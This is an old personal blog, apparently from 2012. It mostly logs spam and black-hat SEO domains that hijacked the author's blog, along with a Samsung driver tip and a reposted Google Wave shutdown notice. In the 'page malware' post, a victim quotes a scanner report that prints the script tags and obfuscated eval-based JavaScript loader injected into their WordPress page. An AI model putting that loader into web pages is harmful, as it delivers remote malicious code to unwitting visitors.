Friday, March 30, 2012

brazilian sites embedding malware into wordpress sites

i just caught http://3ramos.com.br/js/ and some others from the domain .br which asks the viewer to run a java file

you have to manually to the file manager and remove the line from the wordpress theme .
i dont know how they are doing it or if wordpress is vunreable ?

blackhat blog seo hijackers negative seo

30th July 2013
 www.vampirestat.com
 www.adsensewatchdog.com |

20th May 2013

http://cardcatalog.ru/
http://ikinoshka.ru/
http://24rutv.net/
http://binrating.ru/
http://est-otdyh.ru/
http://euro-casino.ru/casino/
http://flatrentodessa.com/
http://graffcom.ru/
http://haremont.ru/
http://igry-onlajn.rx24.ru/



10th May 2013
 celyjmir.ru | spbinweb.ru | allproall.com

http://blogreviews.is-groovin.it/
http://current.com/
http://current.com/1rhh7kc
http://flf-course.com/?a_aid=51893d1ad4b02



17th April 2013


http://sitetourism.com/  russian site

http://www.films4apple.ru/



14th april 2013 


www.kmzackblogger.com  ???
www.techkgp.com
http://www.techkgp.com/search?updated-max=2013-03-01T07:32:00-08:00&max-results=7  wordpress seo blackhat? or blogger blackhat?
mawords.com    typos in different countires ???
www.0p9cx.net.hi.net.bz  500 Internal Server Error


26th jan 2013



  • best-porno.biz
  • sadkings.net
  • viktoria-center.ru
  • www.aprovpn.com


16th Jan 2013




  • cookingmeat.ru
  • fingerfate.net
  • fermersovet.ru
  • thedomainfo.com



13th Jan 2013



  • cookingmeat.ru
  • gonkongnews.funbb.ru
  • monthnews.igraemroli.ru




10th Jan 2013



  • bytovaya-tehnika.blogspot.ru
  • www.seoheap.com
  • ajitjagan.blogspot.in



3rd jan 2013


http://kallery.net/Q/quiz_100.php?d=28&c=blogspot&t=1356847628

If your blog be listed, you can have heavy traffic.
목록에 블로그가 등록되면 방문자가 급증합니다.


28th dec 2012 



  • basicuse.net
  • hot-man63.ru
  • www.plentagos.com



24th Dec 2012



  • http://bytovaya-tehnika.blogspot.ru/
  • http://electronika-tech.blogspot.ru/
  • http://obo-vsem-blog.blogspot.ru/
  • http://olsi.ru/



22nd December 2012



  • clubsexa.org
  • kinocat.org
  • t.co
  • 101igra.ru
  • avena.com.ua
  • balakovo24.ru
  • blinyrecept.ru
  • calipso.ua
  • carsfires.ru



21st December 2012 



  • bytovaya-tehnika.blogspot.ru
  • electronika-tech.blogspot.ru
  • obo-vsem-blog.blogspot.ru
  • http://club-3t.ru/
  • http://ftbiz.bbnow.ru
  • http://intim.1x-online.ru/



17th December 2012


  • kinocat.org
  • avena.com.ua
  • basicuse.net
  • blinyrecept.ru
  • exspain.ru
  • garnitura.mobi
  • htc-review.ru
  • memyar.com













16th December 2012


basicuse.net
blinyrecept.ru
kinocat.org
exspain.ru
garnitura.mobi
htc-review.ru
kinohall.ru
memyar.com
mrcry.ru



13th Dec 2012

adsensewatchdog.com
zombiestat.com
www.villainstat.com
www.probtheme.com
www.uglystat.com
vampirestat.com
www.liveinternet.ru


12th December 2012


http://www.liveinternet.ru/users/bearone
http://adsensewatchdog.com
http://mazablog.ru/
http://vipik.net/
http://tuberkuleznik.ru
http://mrcry.ru/
http://vampirestat.com/
http://www.villainstat.com
www.liveinternet.ru
adsensewatchdog.com
mazablog.ru
vipik.net
tuberkuleznik.ru


7th Nov 2012

yandex.ru
adsensewatchdog.com
cheap-car-insurance-2013.us
www.searchmobileonline.com
kino-vonline.ru
vipik.net
www.villainstat.com






31st oct 2012

http://0rz.tw/orp80   links to https://ssl.clickbank.net/order/restricted.html?errCode=accntstate&cbhopvendor=gsniper down

http://0rz.tw/CNDUS links to https://ssl.clickbank.net/order/restricted.html?errCode=accntstate&cbhopvendor=omgang down

http://bit.ly/V8eDw0 links to http://www.bloghavoc.com/2012/10/destroy-black-head-in-nose.html active 


24th October 2012


http://maxyporn.com/
http://www.foto-star.ru/
http://lovejewel.ru/



23rd October 2012
adsresultpages.com
www.surfsidecoupons.com
www3.t-8jy1o8pij.trickip.net
www.ontimemarketing.biz
software.refererx.com



22nd october 2012
http://t.co/6kSaxKTT  links to porn site meendo
http://www3.t-8jy1o8pij.trickip.net/?gh9b=i92ixrFibqOtV9urrZacjdytzrGRaZ%2BuaqWdos%2BjnYw%3D
http://www3.t-8jy1o8pij.trickip.net/?7mjoxcpy=W%2BLT07WYprKoU6Tdtl6hXuTd1nSjm6WtmKbfp5NooJ0%3Ddomain:rofldepot.com


domain:rosinvest.comk
domain:tigerfist.ru
domain:www.con-w.com
domain:eminem50cent.ru
domain:forexstrategyguides.com
domain:prof-fx.com
domain:xn------8cdbhmblq2akoxma7a2czgyc1d.xn--p1ai
domain:wcrus.ws
domain:www.sibavtotrak.ru
domain:solo-project.comsolo-project.com
domain:pammclub.ru


20th oct 2012

http://6dd260ed.urlbeat.net/
http://www.freepizzaonline.net/
http://nachofoto.com
http://pu.gg/


18th October 2012

http://www3.t-8jy1o8pij.trickip.net/?7mjoxcpy=W%2BLT07WYprKoU6Tdtl6hXuTd1nSjm6WtmKbfp5NooJ0%3D
http://www3.t-8jy1o8pij.trickip.net/?gh9b=i92ixrFibqOtV9urrZacjdytzrGRaZ%2BuaqWdos%2BjnYw%3D
http://8243b8p8zgqf2a1d4jp5yhh703.hop.clickbank.net/?tid=MOBILEMONEY
http://6dd260ed.urlbeat.net/
http://adsresultpages.com/?aff=5801&saff=1&source=1&q=buy+viagra
http://brokencontrollers.com/today-facebook-viral-spam-t29353584.php

http://www3.t-8jy1o8pij.trickip.net/?7mjoxcpy=W%2BLT07WYprKoU6Tdtl6hXuTd1nSjm6WtmKbfp5NooJ0%3D


17th October 2012
http://adsresultpages.com/

1st october 2012



http://myltivarka.ru/
http://www.sibavtotrak.ru/
http://buduar.info/
http://creditbank.4bb.ru/
http://delayreferat.ru/news.php?readmore=1897
http://funny-clips-online.de/
http://jizzcandance.com/
research.rolevaya.com/
http://adsresultpages.com/?aff=5801&saff=1&source=1&q=buy+viagra
http://buduar.info/
http://6dd260ed.urlbeat.net/
http://searchfunmoods.com/results.php?s=airtal+jo+tera+hai+vo+mera+hai&category=web&a=iron2&f=1&cd=2XzuyEtN2Y1L1QzutDtDtC0C0CtD0D0EyD0CyCtCyByCzy0BtN0D0Tzu0CtByBtCtN1L2XzutBtFtBtFtDtFtAyEyE&cr=1915177114&start=1


27th Sept 2012


http://uglystat.com
http://adsensewatchdog.com
http://in-ter-net.info/



1st September 2012

http://domimore.es/ (RUSSIAN SITE??) why is it linking to blogger sites?

26th August 2012



http://pregolom.com/find/in/index.php
http://software.refererx.com/



25th Aug 2012


http://www.velomagazin.com.ua/ (inbound links to unrelated blogger sites . ??)
http://postel-kiev.com.ua/




16th August

http://www.meendo.com/videos/teen+amateur?sort=rating_down&partner=2631
http://software.refererx.com/
http://kallery.net/index.php (biggest offender for new blog hijacking)
http://www.filmhill.com/redirect.php?url=http%3A%2F%2Ft.co%2FUEmjqui3




12th Aug
http://myhealthscore.com/
11th
http://www.filmhill.com/redirect.php?url=http%3A%2F%2Ft.co%2FUEmjqui3


1st aug 2012
http://myhealthscore.com/frame.cfm?page=http%3a%2f%2ft.co%2fz1v6ZazZ

July 31st 2012

http://www.devscripts.net/frame.php?url=http%3a%2f%2ft.co%2fYwAPiP08
http://fr.netlog.com/go/out/url=http%3a%2f%2ft.co%2fz1v6ZazZ
http://www.aptratings.com/review/frame_page.jsp?page=http%3a%2f%2ft.co%2fDUMoaedy


July 25th 2012

http://www.buzzdock.com/Pages/Search.aspx?a=1&guid=cf89b5d1-d396-429b-909a-7e7234f192f3#

July 24th 2012

http://www.justcontests.in/todays_contest.php
http://www.airportcigarettes.com/
http://www.airportcigarettes.com/?aid=13317842&tid=111





21st July 2012

http://dlm.dn.ua/
http://avena.com.ua/
http://housemilan.ru/news.php?readmore=479
http://adf.ly/6unyn
dlm.dn.ua
housemilan.ru
avena.com.ua
www.velomagazin.com.ua
zontcentrum.ru
http://kallery.net/index.php?d=25&c=blogspot&g_clss=forum&g_prcss=list&g_brd=113
http://drmakiko.com/
http://74.125.71.132/
http://start.funmoods.com/
http://kallery.net/index.php?d=26&c=blogspot&g_clss=forum&g_prcss=list&g_brd=113
http://www.listmyfive.co.in/ea403bec/The-Top-Five-Wrist-Watch-Brands

housemilan.ru
www.listmyfive.co.in
www.securemymind.com
yandex.ru
dlm.dn.ua

http://con-w.com/
http://king-resellers.com/
http://www.host-king.net/
http://zippic.info/
http://ginaandrandy.com/
http://www.5starauthorhouse.com/

http://10.225.161.94:15871/




1st July 2012

www.how-you-can-make-money-online-guide.blogspot.com
tiere.t-online.de
www.xfzuoan.com
www.bestweightlosspillsforwomen.wallinside.com
www.maximlift.com
www.celebrity-pix.co.uk
www.gamer20.com
www.techsatishdesi.com
www.ourdollars.com
www.wiisworld.com



29th june 2012
http://babyboutiquestores.info/luvable-friends-10-piece-baby-socks-gift-set-blue-0-9-months/

28th June 2012
http://drmakiko.com/
http://myhealthcare.com/
http://adf.ly/
http://www.securemymind.com/
http://helmsman.sg1004.myweb.hinet.net/tracker/index.html
http://download-fruitninja.ru/
http://guildoftraders.ru/
http://video.cosmosonline.ru/
http://www.dailysmi.ru/


17th June 2012
getdentalimplantsinfo.com
www.pageglimpse.com
www.searchmobileonline.com





14th June 2012
http://98f3687e.goneviral.com/




6th june 2012

sovetogorod.ru
www.souzenergostroy.ru
www.deco-rum.ru



black hat seo sites 2nd June 2012
http://www.souzenergostroy.ru/
http://ha7.ru/
http://barnatur.com/
http://www.securemymind.com/
http://sovetogorod.ru/
http://www.archidom.in/
http://cs-wh.ru/


http://www.etiole.com/

http://kallery.net/.
http://kallery.net/index.php?d=30&g_clss=forum&g_prcss=list&g_tmplt=&g_brd=113&g_pg=1&g_ordr=vws+DESC&c=blogspot
http://webhosting-blog.info/



June 1st 2012

http://www3.hardtakdefense.dnset.com/
http://www3.bestbxcleaner.com/
http://www3.personal-scanera.com/


31st may 2012



http://buygenericsfromindia.com/?wm=13059&tr=8030
http://www.mspy.com/?aff=513
http://www.singlescrowd.com/index.do?refId=BC-86924
http://f-ace-app.com/1729
http://instant-online-refills.com/?wm=13059&tr=8030
http://baby-car-seats.info/

http://www.bigfinder.de/
http://www.etiole.com/
http://y-xaxa.com/
http://associatcs.ru/
http://barnatur.com/
http://www3.bestbxcleaner.com/
http://weightloss-101-blog.blogspot.com/
http://www.securemymind.com/
http://getdentalimplantsinfo.com/
http://www3.hardueantivir.dnset.com/?pf1=lNuazJ6nmq6Zh9rnpqObmOTanaXDo52qy5WnrMyvnpY%3D

29th may 2012





http://doneforyoutrafficz.com/

  • www.keywordpicture.com
  • zomobo.net
  • azerimix.com
  • www.tagged.com
  • images.mitrasites.com
  • search.rubylane.com
  • www.vegasnewschannel.com
  • tube.7s-b.com
  • test.video-hned.cz
  • www.hotfilesearch.com
  • 3rbb.com
  • www.bishitszik.com
  • www.bestrapidsharesearch.com
  • sexyhalloweenpcostume.info
  • trendsbuzz.com
  • globalgateway.eu
  • youtube.3rbdream.net
  • www.cineworld.clipsmix.pl
  • www.funnyhumorclips.net
  • regaetonmix206148.hi5.com
  • deaoraeinb.info
  • www.obzot.net/
  • www.pickmeupnow.com
  • 0km.jp/?tag=Sepik
  • video.dainutekstai.lt/
  • pregnancy.find-answers.info
  • video.xsrpm.com
  • edviagarbuy.solidwebhost.com
  • highdl.us
  • soapextra.com
  • www.videogamz.com
  • zml.name







23rd may

http://homeimprovementtips-blog.blogspot.com/
http://getaway2india.wordpress.com/



21st may 2012
http://www3.bestbxcleaner.com/ still getting redirect from this site. but if you goto the site it gives a 404 ngix so what is the deal with this site?
http://fotobaza.su/


20th may 2012


http://www.777seo.com/seo.php?username=martyxmas&format=ptp
http://www.paid-to-promote.net/member/signup.php?r=martyxmas
http://www.trafficswarm.com/go.cgi?285637
http://www.securemymind.com/ (interesting this site has cloud flare) why is this site still directing traffic ?
http://sovetogorod.ru/frukt_poleza_ananas.html

19th may
http://www4.strongdxgsoft.com/
http://domcom.es/
http://glassesvogue.net/
http://www.blazingsecurity.com/
http://www.etiole.com/
http://www.isvoc.com/information-security-awareness-video-library.html (chinese site)
http://megalovehouse.info/
http://www.linklegends.com/free-trial
http://www.bigfinder.de/en/
http://www.listmyfive.co.in/ea403bec/The-Top-Five-Wrist-Watch-Brands
http://5f258933.theseforums.com/
http://www3.bestbxcleaner.com/
http://cooking-ideas.hot-trend-now.com/
http://www.trippermap.com/


18th may
http://events.ojcaejndjyieneff.podomatic.com/entry/2012-04-22T08_52_28-07_00
http://pul.se/Kotaku-Originals-Rated-C-for-Creepy-Original-Dead-Space-Original-Kotaku-Originals-Originals-8abtOZNQvAiS
http://glassesvogue.net/ (looks like a normal site but how am i getting redirects from this site where there is no mention of posts from my site)
http://www.securemymind.com/ (chinese site?)


16th

what kind of black hat site is this??
http://www.adventurezanskar.com/?fp=zPtk007RQBUZO0A1DkA%2BVxs6c%2BleU4kEFXBptHC2AoBFRw0MoJtazXyeHv%2F0RhKUg8aJ3CHBwGtfZmYEZOZBDw%3D%3D&prvtof=EUk1wUB7ZjGXrDa248VrwmVcW6g82kmyGA8obhm1HoJJA%2BfrEX4jSeVSs8pYUszAwYIj%2BZgKCXAtrirfNPVzfEsjRwm9ulMzEJuads3MWio%3D&poru=pWgokYBR3ClM0VOLR4IJTkQWnVMDIge3hX8cls4oAe3iAGeL2zmcKiM38yyGaiMu41EyD79AUpTT%2Fua8hE7yCg%3D%3D

http://twowayserf.com/cgi-bin/r.cgi?p=15003&i=1ef48b33&j=325&m=145b919a3032473efd08a76afe9648c1&h=www.mangath.com&u=%2Fbbs%2Fforum.php&q=mod%3Dviewthread&tid=11991&t=20120516220019&framerequest=1&refurl


15th May

http://www.bigfinder.de/en/
http://hair-tips.net/



14th may

I do not know what black hat seo tricks this guys are using but looks like panda and penguin an monkey google have not got them and they list higher than good content curated sites .Some kind of feed scraping and keyword tricks?

http://www.archidom.in/ russian site for a .in domain
www.moneybuzz.in
www.yasni.co.uk
www.yasni.ca
skandalekommunikation.dk
slowkart.com
createrz.no
empatwisataindonesia.com/
waywework.it
www.peekyou.com
ngladyraiders.com


11th may

this fall into some linking category not sure whats the deal with these sites

http://www.haaram.com/
http://www.smartdefine.org/nehru_institute_of_mountaineering/web
http://m.acronymgeek.com/
http://newsodrome.com/
http://www.traildino.com/trace/continents-Asia/countries-India
noupe.com



9th may
more scrapers ?


http://www.bigfinder.de/en/4
http://www.linklegends.com/free-trial
http://roblescaroline.livejournal.com
http://www.securemymind.com/
http://ae442647.whackyvidz.com
http://fotobaza.su/
http://neoindian.org
http://networkedblogs.com/wLxk8
http://vsenaydem.com/








May 5th

http://xn--80aheskksgj.xn--p1ai/
http://korop.in/ russian site
http://oboi-dla-rabochego-stola.ru/
http://www.blazingsecurity.com/



may 3rd
http://ae442647.whackyvidz.com/
http://myhealthcare.com/
http://brokencontrollers.com/today-facebook-viral-spam-t29353584.php
http://blablabla.in/ russian site




http://avena.com.ua/ russian site selling creams and other stuff
http://megalovehouse.info/ russian dating site
http://www.mebel-mia.ru/ russian home swap site?
http://www.socioforum.su/ russian forum

Black seo scraper links may 1st 2012?
http://www3.personal-scanera.com/?y7vf7bk=nazfynSXoamZmN%2Fiq46eU%2BfXzavJo5auaqqWbZmbqIk%3D
http://www4.best-aruchecker.com/?7mlwvblk4=W%2BLV27OXoqRoiNHmsVqTmOnX1KLGnMenmaGfrKuYpY8%3D
http://www.les.fm/
http://indiahacker.com/
http://www3.bestbxcleaner.com/
http://ideathathits.com/2011/reasons-for-gravity-mobile-spy-software/
http://www4.safe-vochecker.com/?t1bur=mKbL2a%2Bol5%2BZU%2BLioJmVmZHZ5uBum6aoqJSanWCropyM
http://hoodiastock.com/?wm=13059&tr=8035


it does not look like google anti spam,google panda,google penguin can has any effect on these 
sites. 
I feel the fundamentals of the google algorithm (based on seo links,title(h3) is the cause of the quality of search results right now )



http://magicofmakingupx.webstarts.com

www.mulberryoutletsales.net
http://fabrika-shatura.ru/
http://penfriends-international.com/
http://pro-taganrog.ru/
http://torentilo.com
hoodiastock.com
www.stop-a-cheater.com
http://adfoc.us/198121
http://www.googlecorrection.com  ????
http://www.777seo.com/seo.php?username=martyxmas&format=ptp

http://www.justforlaughsgags.tv
www4.safe-vochecker.com
freebiescom.org
www.blogobo.com
www4.savegco-antivir.com
stopsmoking-instantly.info
pingywebedition.somee.com
8b6beb9a.ultrafiles.net
articlemarketingrobots.org
www.securemymind.com (Chinese site?)
http://www.mebel-mia.ru/
http://alltehno.com/ russian
http://neoindian.org
http://log.go.com/log?srvc=ndbvj&goto=http://e3401crfnbydbre5tdk--31htl.hop.clickbank.net
http://www4.strongdxgsoft.com/?4u0i=WOqZzbCpqKiijdDrpKChjOio4W2dpKqn0qKamdqZpZM%3D
http://ideathathits.com/
http://myhealthcare.com/
http://6c9i8o.socialbuzz25.com/easiest-way-to-learn-to-speak-spanish-download-g-64/
http://rankbuilder2.net/
http://oponykrakow.net.pl/
http://duckduckgo.com/post.html
http://www.pornofilmevi.net/


http://korop.in/
http://www.snite-mebel.ru/







page malware

found this on my wordpress index page

how did it embed into the home page?


Anomaly behavior detected (possible malware).
Details: http://sucuri.net/malware/malware-entry-

mwanomalysp8
< script type="text/javascript"

src="http://ninjutsu.ws/js/">
< script type="text/javascript"

src="http://abellacasa.com.br/_str/">

Javascript included from a blacklisted domain.
Details: http://sucuri.net/malware/entry/MW:BLK:2
Javascript: abellacasa.com.br


http://ninjutsu.ws/js/
function r(s) { var i = 0; var ss = ''; for (i=s.length

- 1; i >= 0; i--) { ss += s.charAt(i); } return ss; }

try { new document(1111); } catch(e) { x = eval; x(r

('"=crs "tpircsavaj/txet"=epyt

tpircs<\'(etirw.tnemucod') +

'http://ninjutsu.ws/js/1.js' + r(')\'>tpircs/<>"')); }

bcm21553 thunderbird ERROR ON windows vista samsung galaxy y

though it gives an error bcm21553 thunderbird. when you open samsung kies it works fine. no need to search  for driver. just use the samsung kies application

Monday, March 19, 2012

Google Wave Sunsetting in 2012

Dear Wavers,
More than a year ago we announced that Google Wave would no longer be developed as a separate product. Back in November 2011, we shared the specific dates for ending this maintenance period and shutting down Wave. Google Wave is now in read-only mode. This is reminder that the Wave service will be turned off on April 30, 2012. You will be able to continue exporting individual waves using the existing PDF export feature until the Google Wave service is turned off. We encourage you to export any important data before April 30, 2012.
If you would like to continue using Wave, there are a number of open source projects, including Apache Wave. There is also an open source project called Walkaround that includes an experimental feature that lets you import all your Waves from Google. This feature will also work until the Wave service is turned off on April 30, 2012.
For more details, please see our help center.
Yours sincerely,
The Wave Team

Sunday, March 18, 2012

spamming and hijacking sites


s - www.singlescrowd.com | buygenericsfromindia.com | f-ace-app.com

http://purecosmeticstips.com/the-truth-organic-natural-cosmetics/


http://multek.tv/
http://8gamers.ru/
http://lepkind.com.ua/
http://planet-best.ru/
http://www.zvezdaput.net/wordpress/
http://lugin.ru/
http://moregirls.org/
http://omeditacii.info/

these sites hijack blogger site . dont know how (black hat seo?)